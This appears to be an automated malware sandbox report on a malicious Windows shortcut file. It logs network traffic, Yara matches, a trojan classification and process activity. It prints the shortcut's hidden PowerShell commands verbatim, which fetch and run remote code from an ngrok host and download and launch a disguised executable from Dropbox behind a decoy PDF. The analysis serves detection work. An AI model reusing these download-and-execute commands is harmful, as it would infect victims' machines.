                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                    Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49724 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49726 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49727 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49736 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.6:49783 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49818 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.6:49855 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.6:49874 version: TLS 1.2
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_72acdd4a-1
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_ac75da95-f
                    Source: Yara matchFile source: 33.3.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.4e70000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.3.148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.5090000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.3.fontdrvhost.exe.56e0000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 34.3.fontdrvhost.exe.54c0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000021.00000003.2763809170.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.2769625867.00000000054C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000003.2764066518.0000000005090000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000003.2770000579.00000000056E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe PID: 8812, type: MEMORYSTR

                    System Summary

                    barindex
                    Drops large PE files
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeFile dump: PerfectoUna.exe.32.dr 979567147Jump to dropped file
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeJump to dropped file
                    Windows shortcut file (LNK) contains suspicious command line arguments
                    Source: QhR8Zp6fZs.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_0000011370011CF4 NtAcceptConnectPort,CloseHandle,39_2_0000011370011CF4
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_00000113700115C0 NtAcceptConnectPort,39_2_00000113700115C0
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_0000011370010AC8 NtAcceptConnectPort,NtAcceptConnectPort,39_2_0000011370010AC8
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_0000011370011AA4 NtAcceptConnectPort,NtAcceptConnectPort,39_2_0000011370011AA4
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD346DB94F22_2_00007FFD346DB94F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD346DC30822_2_00007FFD346DC308
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_004781A932_2_004781A9
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0270C23133_3_0270C231
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_027181D233_3_027181D2
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_3_0270C40033_3_0270C400
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_2_004781A933_2_004781A9
                    Source: C:\Windows\System32\fontdrvhost.exeCode function: 39_2_0000011370010C7039_2_0000011370010C70
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: String function: 0270CD90 appears 33 times
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8812 -s 440
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe.22.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Source: PerfectoUna.exe.32.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802573610.00000000043C9000.00000040.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2759956184.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2765700918.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .a_po^ ojYd.o B U.R G v.Q_F& ZNH K.9.sV`OQ qOq_A( N5.j P.X z.k.Yf_HL.P.L`.C Ue_q_B_t.h{_yr\=A f.3_q_Fvb_H_bm W.UP#.by_iY.Yw I.Y_G p.3c g.Zy S v.U.N C_m Z_i.H_j B l_DH_Pd.iz_O.f~ U z_Mv_d7 T Mz.f.594/}_m kS.v.D u.rZu.S G.N_x.V J.Q.G FO^.X<.6_fv.V ny.L,_E.2.m I_l.b$ Mx sZ.K! p.Y.U.V:U.89 R_H F3.d_R A UQ.C_y y Y Jb.Q_S.N.s< l_Ab~[_w9zV?!C9.N_HQ)*_n R.tP Ww_u aU;.V EPk Xr.Q0.y.A!]_b!7 g.R_pF.E_b o.o.q.o_E.T_rdfw.c}_ck.4.Y_w:_P.B(#`_xy_i.3_Y.A_N.q.6.YE_S_T.R H n.R_d_F.V.s_R68).I aL q.H b.W.Q!.r b_w c c$_va.X_v.tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_C_Q.e J q7E V P.LP_Q.kTN_c.F.D gc.hT_s_Q1
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802573610.00000000043C9000.00000040.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2759956184.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2765700918.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .tRm l.sln_D c! C.7_F m M_j6 zr.w F i}%_N.RB A7_wG_m.4_A#&.G mCx.Q_s N pTS.n.e C.4_v_
                    Source: classification engineClassification label: mal100.troj.evad.winLNK@86/286@21/11
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_004149D0 PathRemoveFileSpecW,GetLastError,WaitForSingleObject,GetExitCodeProcess,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Sleep,32_2_004149D0
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,32_2_004029A0
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,32_2_004029A0
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 33_2_004029A0 StartServiceCtrlDispatcherW,GetLastError,33_2_004029A0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9048
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8780:120:WilError_03
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-c7331d53-a9b0-47e184-2a3bb56f4bc8}
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zozlqomb.dru.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" "
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: QhR8Zp6fZs.lnkVirustotal: Detection: 29%
                    Source: QhR8Zp6fZs.lnkReversingLabs: Detection: 15%
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=2152,i,15865133504281396123,895058618401071371,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2780 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5296 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5284 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7920 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2144,i,12226870336135791064,6646612057330191858,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8232 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8812 -s 440
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9048 -s 140
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6752 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1 Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" "Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=2152,i,15865133504281396123,895058618401071371,262144 /prefetch:3Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2780 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:3Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5296 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5284 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
